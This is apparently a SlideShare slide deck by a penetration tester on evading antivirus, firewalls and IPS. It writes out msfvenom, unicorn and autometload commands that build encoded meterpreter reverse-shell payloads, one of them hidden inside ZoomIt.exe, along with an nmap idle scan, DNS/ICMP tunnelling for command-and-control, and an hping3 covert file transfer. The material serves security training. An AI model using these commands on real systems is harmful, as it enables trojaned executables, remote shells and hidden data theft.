SlideShare a Scribd company logo
Antivirus, Firewall, and
IPS Evasion Techniques
CANDAN BOLUKBAS
BY NORMSHIELD SECURITY
Candan BOLUKBAS
• CTO of NormShield Security, Inc.
• Computer Engineering BS
• 5+ Network & Security Admin, 5+ Pentester
• CCNA, CCNP, CEH, LPT, MCP, CHFI, ECIH, ECSP
• candan.bolukbas@normshield.com
• @candanbolukbas
• @NormShield
Agenda
Anti-Virus Evasion Techniques
◦msfvenom
◦veil-evasion
◦shellter
◦unicorn
◦metload
Firewall | IPS Evasion Techniques
◦Stage Encoding / Encryption
◦Zombie scan
◦Tunneling
◦Custom SOCKS proxy
◦Promiscuous transfer
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=172.16.52.211 LPORT=443 -f exe -o rev_tcp_211_442.exe
https://www.virustotal.com/en/file/df5433d6d23fe2dd87a75c9e402233f37ee3bd4f413fc60aabf0e6428dd48127/analysis/1471898471/
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -x
ZoomIt.exe -f exe -o rev_tcp_shikata_211_443.exe
https://www.virustotal.com/en/file/9bc6fc56f936adce7d9bf5582b283a139dad82d4955bf4c8883c3619fb83cf73/analysis/147189938/
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -
e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e
x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e
x86/shikata_ga_nai -i 6 -f exe -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe
https://www.virustotal.com/en/file/d8b9f086aefb89d1e05bc0e86a254570430af6ae844e1336d7ce4d7aaceb73bd/analysis/1471899934
Veil-evasion => c/meterpreter/rev_tcp
https://www.virustotal.com/en/file/e8ec8d881ce7b99aa2436c5d277816861714414f23505333a8ad15b56cec0627/analysis/1471900386/
Veil-evasion => python/shellcode_inject/aes_encrypt
https://www.virustotal.com/en/file/597e54d213f9d9d84aa710247e7caa6cadf7f686fb4968fdded9eacd7d3f4e5c/analysis/1471902312/
Shellter => auto & buitlin meterpreter payload
https://www.virustotal.com/en/file/bdb1e245fb0ab720353bc249648769a1a54c681ba5727d15c2ef1072ec0993e0/analysis/1471903783/
Shellter => auto & custom multi encode meterpreter payload
https://www.virustotal.com/en/file/80a7124e2fc6e496d03eef0ea6a3912a13dbe3240510be12b7394230e043e56f/analysis/1471904502/
./unicorn.py windows/meterpreter/reverse_tcp 172.16.52.211 443 macro
https://www.virustotal.com/en/file/5745d2856e4b1e47f8946f0c272b278fb25ef56d7a5bd43657fb0a41882fcdb2/analysis/1471905607/
./autometload.py 2 172.16.52.211 443
https://www.virustotal.com/en/file/25dd87d068b879839f7625c50af4a3adbfc9defc21a6d7455539d0cb6c916749/analysis/1471905916/
EvasionTechniques
Stage Encoding & Encryption
https://github.com/DiabloHorn/undetected-meterpreter-stagers
nmap -sI 172.16.52.205:445 172.16.52.204 --top-ports
Basics
L2 – Ethernet : ~28 byte (RFC 894)
L3 – IP : 20 byte (RFC 791)
L4 – TCP / UDP: ~20 – 60 byte
(RFC 793 / 768)
L7 – HTTP, SSH, DNS…
Wireshark
MAC IP TCP / UDP HTTP / FTP / DNS
Layer #2 Layer #3 Layer #3 Layer #5-7
What is protocol tunnelling?
Basicallytransporting a protocolinside another protocollike GRE (IP protocol 47) which transportsother IP
protocolslike IPv4 (protocol 4), TCP (protocol6) etc.
For instance:a DNS package looks like below:
+------------------------------------------------------------+
| MAC | IP | UDP | DNS | Data :::::::::::::::::::::::::::::: |
+------------------------------------------------------------+
If we use DNS as the transport protocol,we can place a TCP package in the following way :
+------------------------------------------------------------+
| MAC | IP | UDP | DNS | | IP | TCP | HTTP | Data :::::::::| |
+------------------------------------------------------------+
Basic Tunnelling
Generic Routing Encapsulation
(GRE) is a tunneling protocol
developed by Cisco Systems
that can encapsulate a wide
variety of network layer
protocols inside virtual point-
to-point links over an Internet
Protocol network. [Wikipedia]
MAC
IP
GRE
IP
ICMP
DATA
IP over ICMP
IP over DNS
DNS Tunnel capable malware
Tunnelling demos
ICMP172.16.52.203 172.16.52.216 HTTP Internet
DNS172.16.52.216 Local DNS Server DNS InternetAuth. DNS Server HTTP
DNS172.16.52.216
Local DNS
Server
DNS InternetAuth. DNS
Server
HTTP C&CHTTP
DNS Tunnel
DNS Tunnel capable malware
Custom Tor Configurations
meek is a pluggable
transport, an obfuscation
layer for Tor designed to
evade Internet censorship.
Whonix is an operating system focused
on anonymity, privacy and security. It's
based on the Tor anonymity network,
Debian and security by isolation.
Tor is a connection-oriented
anonymizing communication service.
SocksPort:443 defines which port is
going to used for SOCKS Proxy
HTTPSClient
Custom
Tor
Tor Internet
GWClient Whonix Tor Internet
promisctunnel.py & hping3 172.16.52.211 -p 11111 -d 100 -E file
PromiscTunnel
Client sends a file to destination’s
10 different closed ports!

More Related Content

PDF
Cisco ASA Firewall Interview Question "aka Stump-the-Chump" Question # 01
Duane Bodle
 
PDF
Free radius billing server with practical vpn exmaple
Chanaka Lasantha
 
DOCX
Kickstat File_Draft_ESXI5.1_Template
Luca Viscomi
 
PDF
SMTP STS (Strict Transport Security) vs. SMTP with DANE
Men and Mice
 
PDF
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
 
ODP
Rete di casa e raspberry pi - Home network and Raspberry Pi
Daniele Albrizio
 
PPTX
Basic ASA Configuration, NAT in ASA Firewall
NetProtocol Xpert
 
PDF
DNSSEC signing Tutorial
Men and Mice
 
Cisco ASA Firewall Interview Question "aka Stump-the-Chump" Question # 01
Duane Bodle
 
Free radius billing server with practical vpn exmaple
Chanaka Lasantha
 
Kickstat File_Draft_ESXI5.1_Template
Luca Viscomi
 
SMTP STS (Strict Transport Security) vs. SMTP with DANE
Men and Mice
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
 
Rete di casa e raspberry pi - Home network and Raspberry Pi
Daniele Albrizio
 
Basic ASA Configuration, NAT in ASA Firewall
NetProtocol Xpert
 
DNSSEC signing Tutorial
Men and Mice
 

What's hot (15)

PDF
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Cisco Russia
 
PDF
Unidade3 roteiro proxy
Leandro Almeida
 
PDF
Configure Proxy and Firewall (Iptables)
Tola LENG
 
PDF
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Pavel Odintsov
 
PDF
Webserver Architecture Example
Ohio University
 
RTF
More Information
Aristotle Miranda
 
PDF
Basic security & info
Tola LENG
 
PDF
Intro to Packet Analysis - pfSense Hangout May 2014
Netgate
 
PDF
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Netgate
 
PDF
Raspberry pi 3
Sanket Kakde
 
PDF
Network Security
UTD Computer Security Group
 
PPTX
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Dhruv Sharma
 
PDF
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Netgate
 
PDF
Linux Security Crash Course
UTD Computer Security Group
 
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Cisco Russia
 
Unidade3 roteiro proxy
Leandro Almeida
 
Configure Proxy and Firewall (Iptables)
Tola LENG
 
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Pavel Odintsov
 
Webserver Architecture Example
Ohio University
 
More Information
Aristotle Miranda
 
Basic security & info
Tola LENG
 
Intro to Packet Analysis - pfSense Hangout May 2014
Netgate
 
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Netgate
 
Raspberry pi 3
Sanket Kakde
 
Network Security
UTD Computer Security Group
 
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Dhruv Sharma
 
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Netgate
 
Linux Security Crash Course
UTD Computer Security Group
 
Ad

Viewers also liked (20)

PDF
CSIRT_16_Jun
Candan BOLUKBAS
 
PPSX
Network secuirty & encryption techniques
manoj kumar
 
PDF
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
PDF
Spo2 t19 spo2-t19
SelectedPresentations
 
PDF
Desofuscando um webshell em php h2hc Ed.9
Ricardo L0gan
 
PPT
Intrusion detection and prevention
Nicholas Davis
 
PDF
Applying Anti-Reversing Techniques to Machine Code
Teodoro Cipresso
 
PDF
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
frank2
 
PDF
Generic attack detection engine
Vikrant Kansal
 
PPT
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
PDF
Obfuscation, Golfing and Secret Operators in Perl
José Castro
 
PPTX
Back to the CORE
Peter Hlavaty
 
PPTX
Attack on the Core
Peter Hlavaty
 
PPTX
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
PPTX
Endpoint Security Evasion
Invincea, Inc.
 
PDF
Deobfuscation and beyond (ZeroNights, 2014)
ReCrypt
 
PPT
Top Tactics For Endpoint Security
Ben Rothke
 
PPTX
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
PDF
Got database access? Own the network!
Bernardo Damele A. G.
 
CSIRT_16_Jun
Candan BOLUKBAS
 
Network secuirty & encryption techniques
manoj kumar
 
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
Spo2 t19 spo2-t19
SelectedPresentations
 
Desofuscando um webshell em php h2hc Ed.9
Ricardo L0gan
 
Intrusion detection and prevention
Nicholas Davis
 
Applying Anti-Reversing Techniques to Machine Code
Teodoro Cipresso
 
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
frank2
 
Generic attack detection engine
Vikrant Kansal
 
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
Obfuscation, Golfing and Secret Operators in Perl
José Castro
 
Back to the CORE
Peter Hlavaty
 
Attack on the Core
Peter Hlavaty
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
Endpoint Security Evasion
Invincea, Inc.
 
Deobfuscation and beyond (ZeroNights, 2014)
ReCrypt
 
Top Tactics For Endpoint Security
Ben Rothke
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
Got database access? Own the network!
Bernardo Damele A. G.
 
Ad

Similar to EvasionTechniques (20)

PPTX
Network tunneling techniques
inbroker
 
PPT
Inside Out Hacking - Bypassing Firewall
amiable_indian
 
PDF
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
Balazs Bucsay
 
PDF
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
Balazs Bucsay
 
PDF
Trick or XFLTReaT a.k.a. Tunnel All The Things
Balazs Bucsay
 
PDF
Coporate Espionage
UTD Computer Security Group
 
PDF
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
Balazs Bucsay
 
PDF
DNS Data Exfiltration Detection
IRJET Journal
 
PDF
XFLTReat: a new dimension in tunnelling
Shakacon
 
PDF
08 tcp-dns
pantu_1961
 
PPT
Ch06-NetworkSecurity2-firewall-tunneling-IDS.ppt
gocokir267
 
PDF
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
Balazs Bucsay
 
PPTX
Tunneling Techniques - HTTP-DNS-ICMP.pptx
HimaVijayanITTeachin
 
PPTX
501 ch 3 network technologies and tools
gocybersec
 
PPTX
Networking Fundamentals
MD SAQUIB KHAN
 
PPT
security
ahmad amiruddin
 
PPT
Firewall - Network Defense in Depth Firewalls
phanleson
 
PPT
Hacking Cisco
guestd05b31
 
PPTX
CY.pptx
CATalyst9
 
PPTX
Network Penetration Testing
Mohammed Adam
 
Network tunneling techniques
inbroker
 
Inside Out Hacking - Bypassing Firewall
amiable_indian
 
XFLTReaT: A New Dimension in Tunnelling (HITB GSEC 2017)
Balazs Bucsay
 
XFLTReaT: A New Dimension In Tunnelling (DeepSec 2017)
Balazs Bucsay
 
Trick or XFLTReaT a.k.a. Tunnel All The Things
Balazs Bucsay
 
Coporate Espionage
UTD Computer Security Group
 
XFLTReaT: a new dimension in tunnelling (BruCON 0x09 2017)
Balazs Bucsay
 
DNS Data Exfiltration Detection
IRJET Journal
 
XFLTReat: a new dimension in tunnelling
Shakacon
 
08 tcp-dns
pantu_1961
 
Ch06-NetworkSecurity2-firewall-tunneling-IDS.ppt
gocokir267
 
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
Balazs Bucsay
 
Tunneling Techniques - HTTP-DNS-ICMP.pptx
HimaVijayanITTeachin
 
501 ch 3 network technologies and tools
gocybersec
 
Networking Fundamentals
MD SAQUIB KHAN
 
security
ahmad amiruddin
 
Firewall - Network Defense in Depth Firewalls
phanleson
 
Hacking Cisco
guestd05b31
 
CY.pptx
CATalyst9
 
Network Penetration Testing
Mohammed Adam
 

EvasionTechniques